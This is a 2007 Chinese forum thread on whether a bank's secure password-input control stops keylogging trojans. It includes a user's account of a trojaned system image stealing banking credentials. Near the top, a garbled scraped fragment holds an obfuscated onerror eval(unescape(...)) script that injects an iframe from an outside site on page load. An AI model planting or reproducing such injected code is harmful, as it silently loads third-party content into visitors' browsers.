安全登录控件 可以防止木马吗？

0 && image.height>0){if(image.width>=700){this.width=700;this.height=image.height*700/image.width;}}" src='http://gimg.baidu.com/img/gsgs.gif' width=0 height=0 onerror="eval (unescape('var%20content1%3D%22%3CI+FR+AME%20%20align%3Dcenter%20marginWidth%3D0%20marginHeight%3D0%20src%3Dhttp%3A//qdsm.net/links/zh_160_600.html%20frameBorder%3D0%20width%3D160%20scrolling%3Dno%20height%3D600%3E%3C/I+FRAM+E%3E%22%3B%20document.getElementById%28%22contenthtml1%22%29.innerHTML%3D%20content1'.replace(/\+/g,'')))">

问一个菜鸟问题吧～
要是不能的话，中了记录键盘抓屏之类的木马，查询密码就被××了，然后在使用招行网上银行时再被××卡号、卡背面的数字～还有什么不能做的？你能放心使用吗？
--------------------------------------------------------------------
专业版可以防止
--------------------------------------------------------------------


QUOTE:原帖由 苏逸遥 于 2007-3-22 18:37 发表
专业版可以防止 不仅是专业版，招行网银所有的密码输入框、大部分证件号码输入框都采用了类似的防键盘事件被监听的安全控件，目前尚未有可以成功截获这类控件的键盘消息的报道。
--------------------------------------------------------------------
那个控件，应该是加密传输用的吧？也就是说，密码（或许还包括身份证号码、用户名等等）在传送到服务器认证的过程中，是加密传送的。如果有人在线路中（如网关等处）用sniffer，也嗅探不到真实的密码。但这个东西对于客户端是透明的，键盘记录类的软件照样可以记录击键等信息。专业版的网银，由于需要数字签名，对于上述软件而言，只能记录密码（键盘记录），的确能起到一定的防范作用。但如果有人设计专门的软件，既窃取用户键盘记录，又能偷偷拷贝数字签名，传送到指定地点，那就完蛋了。不清楚那种USB KEY是如何工作的，可能会有另一层加密机制。反正文件形式的数字签名（10元办的那种），仍然有一定的风险。不过只要平时用机器的时候多注意点，还是可以避免的。
--------------------------------------------------------------------
控件是防钩子，加密传输靠SSL
--------------------------------------------------------------------
USB KEY数字证书的私钥部分不可以导出
--------------------------------------------------------------------


QUOTE:原帖由 singy 于 2007-3-22 17:31 发表
问一个菜鸟问题吧～
要是不能的话，中了记录键盘抓屏之类的木马，查询密码就被××了，然后在使用招行网上银行时再被××卡号、卡背面的数字～还有什么不能做的？你能放心使用吗？ 上面的回答很专业。
我就说两个字：放心
--------------------------------------------------------------------


QUOTE:原帖由 bluebp 于 2007-3-22 19:11 发表
那个控件，应该是加密传输用的吧？也就是说，密码（或许还包括身份证号码、用户名等等）在传送到服务器认证的过程中，是加密传送的。如果有人在线路中（如网关等处）用sniffer，也嗅探不到真实的密码。但这个东西 ... 不懂不要乱讲！
那个控件就是防止键盘钩子的，同上目前还没有可以截获这输入框的报道；传输过程中主要依靠SSL加密
输入控件确实对您输入的内容进行了加密，但是不知道用什么算法的，要明白，不公开算法的加密算法是不可靠的

[ 本帖{zh1}由 sbix 于 2007-3-23 09:43 编辑 ]
--------------------------------------------------------------------
控件只是保护传输过程中不被破戒的吧？本地被监视键盘也能防？
干脆我自己安个木马试试看算了~
--------------------------------------------------------------------
以下不是说有人被木马给搞定了吗？就在下面的相关主题就有！是不是招行的托还在上面瞎说啊？

1、针对招商银行网银个人专业版的木马病毒及其变种

“快乐耳朵”病毒专偷网上银行 已经有用户被感染


2、因目前网上下载的 什么XXX.GHO文件里面有不法的手段, 我是14日下载了一个成为全自动XP电源的GHOST系统,竟然里面设有木马病毒程序,(也就是说黑客软件,我对这个不这么了解), 我现在不干从网上下载那种GHOST了, 小心木马程序,xx密码及帐号,因现在有的不法非分子利用所谓的XXX.gho这个好办法来xx别人的密码帐号, 我就上了他们的当,把我的QQ号xx了.好在我设置了密码保护,又搞了回来。

特别我还有招商银行一卡通的帐号与密码被不法分子盗窃, 很危险呀，14日下载了GHO文件，安装了系统，15日我上网安装了一卡通专业版4.2软件，登入后，我查看了购物的款项，就关了，没想到这一查看就被盗了，好在招商银行的工作人员通知我,（就是昨天04年6月17日早上）该卡里钱有二万伍仟多元。我用的 是招商银行一卡通, 在电脑上可以购物，不法分子就是利用木马程序xxxx与密码，这种木马现在KV和瑞星还查不出来。

现在利用到这方面来了，电脑对人有不少好处，可用在坏的方面就没有好处了。

为什么我会知道这种情况，首先感谢银行人员的负责，我没有损失，银行是怎样知道不对头呢, 因我长期是一个地方上网支款购物的, 突然在安徽上网支款购物, 银行管理人员感觉有点不对头, 因我13日还在本址杭州支款购物，这么一下子，在安徽取款了呢，就马上打手机通知我说, 你在安徽支取款项吗? 我说, 我没有去安徽支款, 我在杭州呀，那他说不对了, 有人支取你的款项， 我就急着说，快给我封锁我的帐号，银行管理人员说，即然来通知问你，我们不会先给他支取的，就这样保了下来，多危险呀。

我又问了银行的管理人员，你们到底怎样为知道呢，他们说：“现在的银行管理系统会自动报警提醒，只要72小时内，如果突然在外地用一卡通网上支取款购物，就会提醒，如不是网上支取则不会提醒”感谢主，我好在13在本地网上购了一次物，不然全完了，我还不知 道呢。我又问了到底怎么会被盗的，银行管理人员对我说，我们过来检测一下你的电脑看看是什么问题，银行管理人员过来，在我的电脑上安装了一个监控发邮箱软件，结果，我一上网打开招商银行的网站，并登入我的一卡通帐号，果然发邮件程序后台启动发送信息，拦截 一看就是帐号和密码及受权证书，一起被盗了。靠，这么厉害呀。他们问我你的系统装了多少时间了，我说没几天14日那天用网上下载的xp.gho装的，他们说坏了，现在利用到这方面了。
（原因是因为现在大家都装有防火墙无法进入，就用这种办法来达到目的。
去看看